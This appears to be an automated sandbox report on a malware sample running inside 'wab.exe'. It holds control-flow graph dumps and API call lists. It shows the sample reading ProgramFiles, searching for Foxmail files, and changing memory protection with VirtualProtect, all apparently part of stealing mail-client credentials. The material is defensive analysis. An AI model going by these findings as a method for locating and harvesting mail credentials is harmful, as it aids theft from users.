240c8c72 7621->7644 7623 240c7286 7622->7623 7625 240c7318 7622->7625 7624 240c8be3 27 API calls 7623->7624 7623->7625 7626 240c72af 7624->7626 7628 240c731f 7625->7628 7626->7625 7627 240c72dd GetFileType 7626->7627 7627->7626 7630 240c7326 7628->7630 7629 240c7369 GetStdHandle 7629->7630 7630->7629 7631 240c73d1 7630->7631 7632 240c737c GetFileType 7630->7632 7631->7607 7632->7630 7648 240c56b9 RtlLeaveCriticalSection 7633->7648 7635 240c7429 7635->7605 7636->7618 7638 240c637b __dosmaperr 20 API calls 7637->7638 7640 240c8b46 7638->7640 7639 240c8b53 7641 240c571e _free 20 API calls 7639->7641 7640->7639 7643 240c5eb7 11 API calls 7640->7643 7642 240c8ba5 7641->7642 7642->7618 7643->7640 7647 240c56b9 RtlLeaveCriticalSection 7644->7647 7646 240c8c79 7646->7617 7647->7646 7648->7635 7649 240c4ed7 7650 240c6d60 51 API calls 7649->7650 7651 240c4ee9 7650->7651 7660 240c7153 GetEnvironmentStringsW 7651->7660 7655 240c571e _free 20 API calls 7656 240c4f29 7655->7656 7657 240c4eff 7658 240c571e _free 20 API calls 7657->7658 7659 240c4ef4 7658->7659 7659->7655 7661 240c716a 7660->7661 7671 240c71bd 7660->7671 7664 240c7170 WideCharToMultiByte 7661->7664 7662 240c4eee 7662->7659 7672 240c4f2f 7662->7672 7663 240c71c6 FreeEnvironmentStringsW 7663->7662 7665 240c718c 7664->7665 7664->7671 7666 240c56d0 21 API calls 7665->7666 7667 240c7192 7666->7667 7668 240c7199 WideCharToMultiByte 7667->7668 7669 240c71af 7667->7669 7668->7669 7670 240c571e _free 20 API calls 7669->7670 7670->7671 7671->7662 7671->7663 7673 240c4f44 7672->7673 7674 240c637b __dosmaperr 20 API calls 7673->7674 7683 240c4f6b 7674->7683 7675 240c4fcf 7676 240c571e _free 20 API calls 7675->7676 7677 240c4fe9 7676->7677 7677->7657 7678 240c637b __dosmaperr 20 API calls 7678->7683 7679 240c4fd1 7680 240c5000 20 API calls 7679->7680 7682 240c4fd7 7680->7682 7681 240c544d ___std_exception_copy 26 API calls 7681->7683 7685 240c571e _free 20 API calls 7682->7685 7683->7675 7683->7678 7683->7679 7683->7681 7684 
240c4ff3 7683->7684 7687 240c571e _free 20 API calls 7683->7687 7686 240c62bc _abort 11 API calls 7684->7686 7685->7675 7688 240c4fff 7686->7688 7687->7683 7192 240c3c90 RtlUnwind 7689 240c36d0 7690 240c36e2 7689->7690 7692 240c36f0 @_EH4_CallFilterFunc@8 7689->7692 7691 240c2ada _ValidateLocalCookies 5 API calls 7690->7691 7691->7692 6930 240c5351 6931 240c5360 6930->6931 6935 240c5374 6930->6935 6933 240c571e _free 20 API calls 6931->6933 6931->6935 6932 240c571e _free 20 API calls 6934 240c5386 6932->6934 6933->6935 6936 240c571e _free 20 API calls 6934->6936 6935->6932 6937 240c5399 6936->6937 6938 240c571e _free 20 API calls 6937->6938 6939 240c53aa 6938->6939 6940 240c571e _free 20 API calls 6939->6940 6941 240c53bb 6940->6941 7193 240c60ac 7194 240c60dd 7193->7194 7195 240c60b7 7193->7195 7195->7194 7196 240c60c7 FreeLibrary 7195->7196 7196->7195 6942 240c506f 6943 240c5087 6942->6943 6944 240c5081 6942->6944 6945 240c5000 20 API calls 6944->6945 6945->6943 6086 240c742b 6087 240c7430 6086->6087 6088 240c7453 6087->6088 6090 240c8bae 6087->6090 6091 240c8bbb 6090->6091 6092 240c8bdd 6090->6092 6093 240c8bc9 RtlDeleteCriticalSection 6091->6093 6094 240c8bd7 6091->6094 6092->6087 6093->6093 6093->6094 6095 240c571e _free 20 API calls 6094->6095 6095->6092 6946 240cac6b 6947 240cac84 __startOneArgErrorHandling 6946->6947 6948 240cacad __startOneArgErrorHandling 6947->6948 6950 240cb2f0 6947->6950 6951 240cb329 __startOneArgErrorHandling 6950->6951 6952 240cb5c1 __raise_exc RaiseException 6951->6952 6953 240cb350 __startOneArgErrorHandling 6951->6953 6952->6953 6954 240cb393 6953->6954 6956 240cb36e 6953->6956 6955 240cb8b2 __startOneArgErrorHandling 20 API calls 6954->6955 6958 240cb38e __startOneArgErrorHandling 6955->6958 6961 240cb8e1 6956->6961 6959 240c2ada _ValidateLocalCookies 5 API calls 6958->6959 6960 240cb3b7 6959->6960 6960->6948 6962 240cb8f0 6961->6962 6963 240cb90f __startOneArgErrorHandling 6962->6963 6964 240cb964 __startOneArgErrorHandling 
6962->6964 6966 240c78a3 __startOneArgErrorHandling 5 API calls 6963->6966 6965 240cb8b2 __startOneArgErrorHandling 20 API calls 6964->6965 6969 240cb95d 6965->6969 6967 240cb950 6966->6967 6968 240cb8b2 __startOneArgErrorHandling 20 API calls 6967->6968 6967->6969 6968->6969 6969->6958 5963 240cc7a7 5964 240cc7be 5963->5964 5968 240cc82c 5963->5968 5964->5968 5975 240cc7e6 GetModuleHandleA 5964->5975 5965 240cc835 GetModuleHandleA 5969 240cc83f 5965->5969 5966 240cc872 5968->5965 5968->5966 5968->5969 5969->5968 5970 240cc85f GetProcAddress 5969->5970 5970->5968 5971 240cc7dd 5971->5968 5971->5969 5972 240cc800 GetProcAddress 5971->5972 5972->5968 5973 240cc80d VirtualProtect 5972->5973 5973->5968 5974 240cc81c VirtualProtect 5973->5974 5974->5968 5976 240cc7ef 5975->5976 5981 240cc82c 5975->5981 5987 240cc803 GetProcAddress 5976->5987 5978 240cc7f4 5978->5981 5982 240cc800 GetProcAddress 5978->5982 5979 240cc835 GetModuleHandleA 5985 240cc83f 5979->5985 5980 240cc872 5981->5979 5981->5980 5981->5985 5982->5981 5983 240cc80d VirtualProtect 5982->5983 5983->5981 5984 240cc81c VirtualProtect 5983->5984 5984->5981 5985->5981 5986 240cc85f GetProcAddress 5985->5986 5986->5981 5988 240cc82c 5987->5988 5989 240cc80d VirtualProtect 5987->5989 5991 240cc835 GetModuleHandleA 5988->5991 5992 240cc872 5988->5992 5989->5988 5990 240cc81c VirtualProtect 5989->5990 5990->5988 5994 240cc83f 5991->5994 5993 240cc85f GetProcAddress 5993->5994 5994->5988 5994->5993 7197 240c81a0 7198 240c81d9 7197->7198 7199 240c81dd 7198->7199 7210 240c8205 7198->7210 7200 240c6368 _free 20 API calls 7199->7200 7202 240c81e2 7200->7202 7201 240c8529 7204 240c2ada _ValidateLocalCookies 5 API calls 7201->7204 7203 240c62ac _abort 26 API calls 7202->7203 7206 240c81ed 7203->7206 7205 240c8536 7204->7205 7207 240c2ada _ValidateLocalCookies 5 API calls 7206->7207 7209 240c81f9 7207->7209 7210->7201 7211 240c80c0 7210->7211 7214 240c80db 7211->7214 7212 240c2ada _ValidateLocalCookies 5 API calls 7213 
240c8152 7212->7213 7213->7210 7214->7212 7693 240ca1e0 7696 240ca1fe 7693->7696 7695 240ca1f6 7697 240ca203 7696->7697 7698 240caa53 21 API calls 7697->7698 7699 240ca298 7697->7699 7700 240ca42f 7698->7700 7699->7695 7700->7695 7215 240c21a1 ___scrt_dllmain_exception_filter 6096 240c543d 6097 240c5440 6096->6097 6100 240c55a8 6097->6100 6111 240c7613 6100->6111 6104 240c55c2 IsProcessorFeaturePresent 6107 240c55cd 6104->6107 6106 240c55b8 6106->6104 6110 240c55e0 6106->6110 6108 240c60e2 _abort 8 API calls 6107->6108 6108->6110 6141 240c4bc1 6110->6141 6144 240c7581 6111->6144 6114 240c766e 6115 240c767a _abort 6114->6115 6116 240c5b7a __dosmaperr 20 API calls 6115->6116 6118 240c76a1 _abort 6115->6118 6121 240c76a7 _abort 6115->6121 6116->6118 6117 240c76f3 6119 240c6368 _free 20 API calls 6117->6119 6118->6117 6118->6121 6140 240c76d6 6118->6140 6120 240c76f8 6119->6120 6122 240c62ac _abort 26 API calls 6120->6122 6126 240c771f 6121->6126 6158 240c5671 RtlEnterCriticalSection 6121->6158 6122->6140 6128 240c777e 6126->6128 6130 240c7776 6126->6130 6137 240c77a9 6126->6137 6159 240c56b9 RtlLeaveCriticalSection 6126->6159 6128->6137 6160 240c7665 6128->6160 6131 240c4bc1 _abort 28 API calls 6130->6131 6131->6128 6136 240c7665 _abort 38 API calls 6136->6137 6163 240c782e 6137->6163 6138 240c780c 6139 240c5af6 _abort 38 API calls 6138->6139 6138->6140 6139->6140 6187 240cbdc9 6140->6187 6191 240c499b 6141->6191 6147 240c7527 6144->6147 6146 240c55ad 6146->6106 6146->6114 6148 240c7533 ___DestructExceptionObject 6147->6148 6153 240c5671 RtlEnterCriticalSection 6148->6153 6150 240c7541 6154 240c7575 6150->6154 6152 240c7568 _abort 6152->6146 6153->6150 6157 240c56b9 RtlLeaveCriticalSection 6154->6157 6156 240c757f 6156->6152 6157->6156 6158->6126 6159->6130 6161 240c5af6 _abort 38 API calls 6160->6161 6162 240c766a 6161->6162 6162->6136 6164 240c77fd 6163->6164 6165 240c7834 6163->6165 6164->6138 6164->6140 6167 240c5af6 GetLastError 6164->6167 6190 240c56b9 
RtlLeaveCriticalSection 6165->6190 6168 240c5b0c 6167->6168 6169 240c5b12 6167->6169 6171 240c5e08 __dosmaperr 11 API calls 6168->6171 6170 240c637b __dosmaperr 20 API calls 6169->6170 6174 240c5b61 SetLastError 6169->6174 6172 240c5b24 6170->6172 6171->6169 6173 240c5b2c 6172->6173 6175 240c5e5e __dosmaperr 11 API calls 6172->6175 6176 240c571e _free 20 API calls 6173->6176 6174->6138 6177 240c5b41 6175->6177 6178 240c5b32 6176->6178 6177->6173 6179 240c5b48 6177->6179 6180 240c5b6d SetLastError 6178->6180 6181 240c593c __dosmaperr 20 API calls 6179->6181 6182 240c55a8 _abort 35 API calls 6180->6182 6183 240c5b53 6181->6183 6184 240c5b79 6182->6184 6185 240c571e _free 20 API calls 6183->6185 6186 240c5b5a 6185->6186 6186->6174 6186->6180 6188 240c2ada _ValidateLocalCookies 5 API calls 6187->6188 6189 240cbdd4 6188->6189 6189->6189 6190->6164 6192 240c49a7 _abort 6191->6192 6193 240c49bf 6192->6193 6213 240c4af5 GetModuleHandleW 6192->6213 6222 240c5671 RtlEnterCriticalSection 6193->6222 6197 240c4a65 6230 240c4aa5 6197->6230 6200 240c4a3c 6204 240c4a54 6200->6204 6226 240c4669 6200->6226 6202 240c4aae 6207 240cbdc9 _abort 5 API calls 6202->6207 6203 240c4a82 6233 240c4ab4 6203->6233 6209 240c4669 _abort 5 API calls 6204->6209 6212 240c4ab3 6207->6212 6209->6197 6210 240c49c7 6210->6197 6210->6200 6223 240c527a 6210->6223 6214 240c49b3 6213->6214 6214->6193 6215 240c4b39 GetModuleHandleExW 6214->6215 6216 240c4b63 GetProcAddress 6215->6216 6217 240c4b78 6215->6217 6216->6217 6218 240c4b8c FreeLibrary 6217->6218 6219 240c4b95 6217->6219 6218->6219 6220 240c2ada _ValidateLocalCookies 5 API calls 6219->6220 6221 240c4b9f 6220->6221 6221->6193 6222->6210 6241 240c5132 6223->6241 6227 240c4698 6226->6227 6228 240c2ada _ValidateLocalCookies 5 API calls 6227->6228 6229 240c46c1 6228->6229 6229->6204 6263 240c56b9 RtlLeaveCriticalSection 6230->6263 6232 240c4a7e 6232->6202 6232->6203 6264 240c6025 6233->6264 6236 240c4ae2 6239 240c4b39 _abort 8 API calls 6236->6239 6237 
240c4ac2 GetPEB 6237->6236 6238 240c4ad2 GetCurrentProcess TerminateProcess 6237->6238 6238->6236 6240 240c4aea ExitProcess 6239->6240 6244 240c50e1 6241->6244 6243 240c5156 6243->6200 6245 240c50ed ___DestructExceptionObject 6244->6245 6252 240c5671 RtlEnterCriticalSection 6245->6252 6247 240c50fb 6253 240c515a 6247->6253 6251 240c5119 _abort 6251->6243 6252->6247 6254 240c517a 6253->6254 6255 240c5182 6253->6255 6256 240c2ada _ValidateLocalCookies 5 API calls 6254->6256 6255->6254 6258 240c571e _free 20 API calls 6255->6258 6257 240c5108 6256->6257 6259 240c5126 6257->6259 6258->6254 6262 240c56b9 RtlLeaveCriticalSection 6259->6262 6261 240c5130 6261->6251 6262->6261 6263->6232 6265 240c604a 6264->6265 6266 240c6040 6264->6266 6267 240c5c45 __dosmaperr 5 API calls 6265->6267 6268 240c2ada _ValidateLocalCookies 5 API calls 6266->6268 6267->6266 6269 240c4abe 6268->6269 6269->6236 6269->6237 6270 240c1f3f 6271 240c1f4b ___DestructExceptionObject 6270->6271 6288 240c247c 6271->6288 6273 240c1f52 6274 240c1f7c 6273->6274 6275 240c2041 6273->6275 6282 240c1f57 ___scrt_is_nonwritable_in_current_image 6273->6282 6299 240c23de 6274->6299 6311 240c2639 IsProcessorFeaturePresent 6275->6311 6278 240c2048 6279 240c1f8b __RTC_Initialize 6279->6282 6302 240c22fc RtlInitializeSListHead 6279->6302 6281 240c1f99 ___scrt_initialize_default_local_stdio_options 6303 240c46c5 6281->6303 6286 240c1fb8 6286->6282 6287 240c4669 _abort 5 API calls 6286->6287 6287->6282 6289 240c2485 6288->6289 6315 240c2933 IsProcessorFeaturePresent 6289->6315 6293 240c2496 6294 240c249a 6293->6294 6326 240c53c8 6293->6326 6294->6273 6297 240c24b1 6297->6273 6400 240c24b5 6299->6400 6301 240c23e5 6301->6279 6302->6281 6306 240c46dc 6303->6306 6304 240c2ada _ValidateLocalCookies 5 API calls 6305 240c1fad 6304->6305 6305->6282 6307 240c23b3 6305->6307 6306->6304 6308 240c23b8 ___scrt_release_startup_lock 6307->6308 6309 240c2933 ___isa_available_init IsProcessorFeaturePresent 6308->6309 6310 240c23c1 
6308->6310 6309->6310 6310->6286 6312 240c264e ___scrt_fastfail 6311->6312 6313 240c26f9 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 6312->6313 6314 240c2744 ___scrt_fastfail 6313->6314 6314->6278 6316 240c2491 6315->6316 6317 240c34ea 6316->6317 6318 240c34ef ___vcrt_initialize_winapi_thunks 6317->6318 6337 240c3936 6318->6337 6321 240c34fd 6321->6293 6323 240c3505 6324 240c3510 6323->6324 6351 240c3972 6323->6351 6324->6293 6392 240c7457 6326->6392 6329 240c3529 6330 240c3543 6329->6330 6331 240c3532 6329->6331 6330->6294 6332 240c391b ___vcrt_uninitialize_ptd 6 API calls 6331->6332 6333 240c3537 6332->6333 6334 240c3972 ___vcrt_uninitialize_locks RtlDeleteCriticalSection 6333->6334 6335 240c353c 6334->6335 6396 240c3c50 6335->6396 6338 240c393f 6337->6338 6340 240c3968 6338->6340 6341 240c34f9 6338->6341 6355 240c3be0 6338->6355 6342 240c3972 ___vcrt_uninitialize_locks RtlDeleteCriticalSection 6340->6342 6341->6321 6343 240c38e8 6341->6343 6342->6341 6373 240c3af1 6343->6373 6346 240c38fd 6346->6323 6349 240c3918 6349->6323 6352 240c399c 6351->6352 6353 240c397d 6351->6353 6352->6321 6354 240c3987 RtlDeleteCriticalSection 6353->6354 6354->6352 6354->6354 6360 240c3a82 6355->6360 6357 240c3bfa 6358 240c3c18 InitializeCriticalSectionAndSpinCount 6357->6358 6359 240c3c03 6357->6359 6358->6359 6359->6338 6361 240c3aaa 6360->6361 6365 240c3aa6 __crt_fast_encode_pointer 6360->6365 6361->6365 6366 240c39be 6361->6366 6364 240c3ac4 GetProcAddress 6364->6365 6365->6357 6371 240c39cd try_get_first_available_module 6366->6371 6367 240c3a77 6367->6364 6367->6365 6368 240c39ea LoadLibraryExW 6369 240c3a05 GetLastError 6368->6369 6368->6371 6369->6371 6370 240c3a60 FreeLibrary 6370->6371 6371->6367 6371->6368 6371->6370 6372 240c3a38 LoadLibraryExW 6371->6372 6372->6371 6374 240c3a82 try_get_function 5 API calls 6373->6374 6375 240c3b0b 6374->6375 6376 240c3b24 TlsAlloc 6375->6376 6377 240c38f2 6375->6377 6377->6346 6378 240c3ba2 6377->6378 6379 
240c3a82 try_get_function 5 API calls 6378->6379 6380 240c3bbc 6379->6380 6381 240c3bd7 TlsSetValue 6380->6381 6382 240c390b 6380->6382 6381->6382 6382->6349 6383 240c391b 6382->6383 6384 240c3925 6383->6384 6385 240c392b 6383->6385 6387 240c3b2c 6384->6387 6385->6346 6388 240c3a82 try_get_function 5 API calls 6387->6388 6389 240c3b46 6388->6389 6390 240c3b5e TlsFree 6389->6390 6391 240c3b52 6389->6391 6390->6391 6391->6385 6395 240c7470 6392->6395 6393 240c2ada _ValidateLocalCookies 5 API calls 6394 240c24a3 6393->6394 6394->6297 6394->6329 6395->6393 6397 240c3c7f 6396->6397 6399 240c3c59 6396->6399 6397->6330 6398 240c3c69 FreeLibrary 6398->6399 6399->6397 6399->6398 6401 240c24c8 6400->6401 6402 240c24c4 6400->6402 6403 240c2639 ___scrt_fastfail 4 API calls 6401->6403 6405 240c24d5 ___scrt_release_startup_lock 6401->6405 6402->6301 6404 240c2559 6403->6404 6405->6301 7216 240c67bf 7221 240c67f4 7216->7221 7219 240c67db 7220 240c571e _free 20 API calls 7220->7219 7222 240c6806 7221->7222 7223 240c67cd 7221->7223 7224 240c680b 7222->7224 7225 240c6836 7222->7225 7223->7219 7223->7220 7226 240c637b __dosmaperr 20 API calls 7224->7226 7225->7223 7232 240c71d6 7225->7232 7228 240c6814 7226->7228 7230 240c571e _free 20 API calls 7228->7230 7229 240c6851 7231 240c571e _free 20 API calls 7229->7231 7230->7223 7231->7223 7233 240c71e1 7232->7233 7234 240c7209 7233->7234 7235 240c71fa 7233->7235 7236 240c7218 7234->7236 7241 240c8a98 7234->7241 7237 240c6368 _free 20 API calls 7235->7237 7248 240c8acb 7236->7248 7240 240c71ff ___scrt_fastfail 7237->7240 7240->7229 7242 240c8ab8 RtlSizeHeap 7241->7242 7243 240c8aa3 7241->7243 7242->7236 7244 240c6368 _free 20 API calls 7243->7244 7245 240c8aa8 7244->7245 7246 240c62ac _abort 26 API calls 7245->7246 7247 240c8ab3 7246->7247 7247->7236 7249 240c8ad8 7248->7249 7250 240c8ae3 7248->7250 7251 240c56d0 21 API calls 7249->7251 7252 240c8aeb 7250->7252 7258 240c8af4 __dosmaperr 7250->7258 7253 240c8ae0 7251->7253 7254 240c571e 
_free 20 API calls 7252->7254 7253->7240 7254->7253 7255 240c8b1e RtlReAllocateHeap 7255->7253 7255->7258 7256 240c8af9 7257 240c6368 _free 20 API calls 7256->7257 7257->7253 7258->7255 7258->7256 7259 240c474f __dosmaperr 7 API calls 7258->7259 7259->7258 7701 240c5bff 7709 240c5d5c 7701->7709 7704 240c5c13 7705 240c5b7a __dosmaperr 20 API calls 7706 240c5c1b 7705->7706 7707 240c5c28 7706->7707 7708 240c5c2b 11 API calls 7706->7708 7708->7704 7710 240c5c45 __dosmaperr 5 API calls 7709->7710 7711 240c5d83 7710->7711 7712 240c5d9b TlsAlloc 7711->7712 7713 240c5d8c 7711->7713 7712->7713 7714 240c2ada _ValidateLocalCookies 5 API calls 7713->7714 7715 240c5c09 7714->7715 7715->7704 7715->7705 7260 240c9db8 7261 240c9dbf 7260->7261 7262 240c9e20 7261->7262 7263 240c9ddf 7261->7263 7264 240caa17 21 API calls 7262->7264 7265 240ca90e 7262->7265 7263->7265 7267 240caa17 21 API calls 7263->7267 7266 240c9e6e 7264->7266 7268 240ca93e 7267->7268 6406 240c5630 6407 240c563b 6406->6407 6409 240c5664 6407->6409 6410 240c5660 6407->6410 6412 240c5eb7 6407->6412 6419 240c5688 6409->6419 6413 240c5c45 __dosmaperr 5 API calls 6412->6413 6414 240c5ede 6413->6414 6415 240c5efc InitializeCriticalSectionAndSpinCount 6414->6415 6418 240c5ee7 6414->6418 6415->6418 6416 240c2ada _ValidateLocalCookies 5 API calls 6417 240c5f13 6416->6417 6417->6407 6418->6416 6420 240c5695 6419->6420 6422 240c56b4 6419->6422 6421 240c569f RtlDeleteCriticalSection 6420->6421 6421->6421 6421->6422 6422->6410 6970 240c3370 6981 240c3330 6970->6981 6982 240c334f 6981->6982 6983 240c3342 6981->6983 6984 240c2ada _ValidateLocalCookies 5 API calls 6983->6984 6984->6982 7716 240c63f0 7717 240c6400 7716->7717 7726 240c6416 7716->7726 7718 240c6368 _free 20 API calls 7717->7718 7719 240c6405 7718->7719 7720 240c62ac _abort 26 API calls 7719->7720 7723 240c640f 7720->7723 7721 240c6480 7722 240c4e76 20 API calls 7721->7722 7727 240c64e5 7722->7727 7725 240c64ee 7728 240c571e _free 20 API calls 7725->7728 7726->7721 
7729 240c6561 7726->7729 7735 240c6580 7726->7735 7727->7725 7732 240c6573 7727->7732 7746 240c85eb 7727->7746 7728->7729 7755 240c679a 7729->7755 7733 240c62bc _abort 11 API calls 7732->7733 7734 240c657f 7733->7734 7736 240c658c 7735->7736 7736->7736 7737 240c637b __dosmaperr 20 API calls 7736->7737 7738 240c65ba 7737->7738 7739 240c85eb 26 API calls 7738->7739 7740 240c65e6 7739->7740 7741 240c62bc _abort 11 API calls 7740->7741 7742 240c6615 ___scrt_fastfail 7741->7742 7743 240c66b6 FindFirstFileExA 7742->7743 7744 240c6705 7743->7744 7745 240c6580 26 API calls 7744->7745 7748 240c853a 7746->7748 7747 240c854f 7749 240c6368 _free 20 API calls 7747->7749 7750 240c8554 7747->7750 7748->7747 7748->7750 7752 240c858b 7748->7752 7754 240c857a 7749->7754 7750->7727 7751 240c62ac _abort 26 API calls 7751->7750 7752->7750 7753 240c6368 _free 20 API calls 7752->7753 7753->7754 7754->7751 7756 240c67a4 7755->7756 7757 240c67b4 7756->7757 7758 240c571e _free 20 API calls 7756->7758 7759 240c571e _free 20 API calls 7757->7759 7758->7756 7760 240c67bb 7759->7760 7760->7723 6985 240c9e71 6987 240c9e95 6985->6987 6986 240c9f71 __startOneArgErrorHandling 6991 240cb2f0 21 API calls 6986->6991 6992 240cacad __startOneArgErrorHandling 6986->6992 6987->6986 6988 240c9ee6 6987->6988 6990 240c9ef8 6988->6990 6993 240caa53 6988->6993 6991->6992 6994 240caa70 RtlDecodePointer 6993->6994 6996 240caa80 6993->6996 6994->6996 6995 240c2ada _ValidateLocalCookies 5 API calls 6998 240cac67 6995->6998 6997 240cab0d 6996->6997 6999 240caab7 6996->6999 7000 240cab02 6996->7000 6997->7000 7001 240c6368 _free 20 API calls 6997->7001 6998->6990 6999->7000 7002 240c6368 _free 20 API calls 6999->7002 7000->6995 7001->7000 7002->7000 7273 240c3eb3 7274 240c5411 38 API calls 7273->7274 7275 240c3ebb 7274->7275

                  Control-flow Graph

                  APIs
                  • lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 240C1137
                  • lstrcatW.KERNEL32(?,?), ref: 240C1151
                  • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 240C115C
                  • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 240C116D
                  • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 240C117C
                  • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,?,?,00000002,00000000), ref: 240C1193
                  • FindNextFileW.KERNELBASE(00000000,00000010), ref: 240C11D0
                  • FindClose.KERNELBASE(00000000), ref: 240C11DB
                  Memory Dump Source
                  • Source File: 00000008.00000002.3287085211.00000000240C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 240C0000, based on PE: true
                  • Associated: 00000008.00000002.3287068428.00000000240C0000.00000004.00001000.00020000.00000000.sdmp
                  • Associated: 00000008.00000002.3287085211.00000000240D6000.00000040.00001000.00020000.00000000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_8_2_240c0000_wab.jbxd
                  Similarity
                  • API ID: lstrlen$Find$File$CloseFirstNextlstrcat
                  • String ID:
                  • API String ID: 1083526818-0
                  • Opcode ID: 0abdbecbf72314bb0d9056320449352226571f26f887f1a2255d948e28ac83a3
                  • Instruction ID: ecc222a99483cebc3b9b1b80348497aa8584ea5103039f4648039ce896719195
                  • Opcode Fuzzy Hash: 0abdbecbf72314bb0d9056320449352226571f26f887f1a2255d948e28ac83a3
                  • Instruction Fuzzy Hash: 6821A272904308ABD721EB64DC48F9F7BDCEF84714F10092AFA58D7190EB74D6848B96

                  Control-flow Graph

                  APIs
                  • GetEnvironmentVariableW.KERNEL32(ProgramFiles,?,00000104), ref: 240C1434
                    • Part of subcall function 240C10F1: lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 240C1137
                    • Part of subcall function 240C10F1: lstrcatW.KERNEL32(?,?), ref: 240C1151
                    • Part of subcall function 240C10F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 240C115C
                    • Part of subcall function 240C10F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 240C116D
                    • Part of subcall function 240C10F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 240C117C
                    • Part of subcall function 240C10F1: FindFirstFileW.KERNELBASE(?,?,?,?,?,?,?,?,00000002,00000000), ref: 240C1193
                    • Part of subcall function 240C10F1: FindNextFileW.KERNELBASE(00000000,00000010), ref: 240C11D0
                    • Part of subcall function 240C10F1: FindClose.KERNELBASE(00000000), ref: 240C11DB
                  • lstrlenW.KERNEL32(?), ref: 240C14C5
                  • lstrlenW.KERNEL32(?), ref: 240C14E0
                  • lstrlenW.KERNEL32(?,?), ref: 240C150F
                  • lstrcatW.KERNEL32(00000000), ref: 240C1521
                  • lstrlenW.KERNEL32(?,?), ref: 240C1547
                  • lstrcatW.KERNEL32(00000000), ref: 240C1553
                  • lstrlenW.KERNEL32(?,?), ref: 240C1579
                  • lstrcatW.KERNEL32(00000000), ref: 240C1585
                  • lstrlenW.KERNEL32(?,?), ref: 240C15AB
                  • lstrcatW.KERNEL32(00000000), ref: 240C15B7
                  Strings
                  Memory Dump Source
                  • Source File: 00000008.00000002.3287085211.00000000240C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 240C0000, based on PE: true
                  • Associated: 00000008.00000002.3287068428.00000000240C0000.00000004.00001000.00020000.00000000.sdmp
                  • Associated: 00000008.00000002.3287085211.00000000240D6000.00000040.00001000.00020000.00000000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_8_2_240c0000_wab.jbxd
                  Similarity
                  • API ID: lstrlen$lstrcat$Find$File$CloseEnvironmentFirstNextVariable
                  • String ID: )$Foxmail$ProgramFiles
                  • API String ID: 672098462-2938083778
                  • Opcode ID: d6741a0b69cd687a9df7b1593f32ed6cdb68d40a4b67cf1e39a6929a078b7201
                  • Instruction ID: 0a98561821497cd1d9d5148e57b05133691aad51bd066ead1e653aa7ea252ab5
                  • Opcode Fuzzy Hash: d6741a0b69cd687a9df7b1593f32ed6cdb68d40a4b67cf1e39a6929a078b7201
                  • Instruction Fuzzy Hash: 8A81A471A00368AAEB20DBA1DC95FEE7379EF44710F10059AF508EB190EAB15EC5CF95

                  Control-flow Graph

                  APIs
                  • GetModuleHandleA.KERNEL32(240CC7DD), ref: 240CC7E6
                  • GetModuleHandleA.KERNEL32(?,240CC7DD), ref: 240CC838
                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 240CC860
                    • Part of subcall function 240CC803: GetProcAddress.KERNEL32(00000000,240CC7F4), ref: 240CC804
                    • Part of subcall function 240CC803: VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,240CC7F4,240CC7DD), ref: 240CC816
                    • Part of subcall function 240CC803: VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,240CC7F4,240CC7DD), ref: 240CC82A
                  Memory Dump Source
                  • Source File: 00000008.00000002.3287085211.00000000240C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 240C0000, based on PE: true
                  • Associated: 00000008.00000002.3287068428.00000000240C0000.00000004.00001000.00020000.00000000.sdmp
                  • Associated: 00000008.00000002.3287085211.00000000240D6000.00000040.00001000.00020000.00000000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_8_2_240c0000_wab.jbxd
                  Similarity
                  • API ID: AddressHandleModuleProcProtectVirtual
                  • String ID:
                  • API String ID: 2099061454-0
                  • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                  • Instruction ID: e8bfa22fc3adfef55564bb0fa9c42d78725ab5c5ac92fb6061e8efee9ba6cba8
                  • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                  • Instruction Fuzzy Hash: 7001D210A4D241F8BB115674CC01ABF5FD89B27664B101BA6EE40C61B3D9A085CEC3A6

                  Control-flow Graph

                  APIs
                  • GetModuleHandleA.KERNEL32(?,240CC7DD), ref: 240CC838
                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 240CC860
                    • Part of subcall function 240CC7E6: GetModuleHandleA.KERNEL32(240CC7DD), ref: 240CC7E6
                    • Part of subcall function 240CC7E6: GetProcAddress.KERNEL32(00000000,240CC7F4), ref: 240CC804
                    • Part of subcall function 240CC7E6: VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,240CC7F4,240CC7DD), ref: 240CC816
                    • Part of subcall function 240CC7E6: VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,240CC7F4,240CC7DD), ref: 240CC82A
                  Memory Dump Source
                  • Source File: 00000008.00000002.3287085211.00000000240C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 240C0000, based on PE: true
                  • Associated: 00000008.00000002.3287068428.00000000240C0000.00000004.00001000.00020000.00000000.sdmp
                  • Associated: 00000008.00000002.3287085211.00000000240D6000.00000040.00001000.00020000.00000000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_8_2_240c0000_wab.jbxd
                  Similarity
                  • API ID: AddressHandleModuleProcProtectVirtual
                  • String ID:
                  • API String ID: 2099061454-0
                  • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
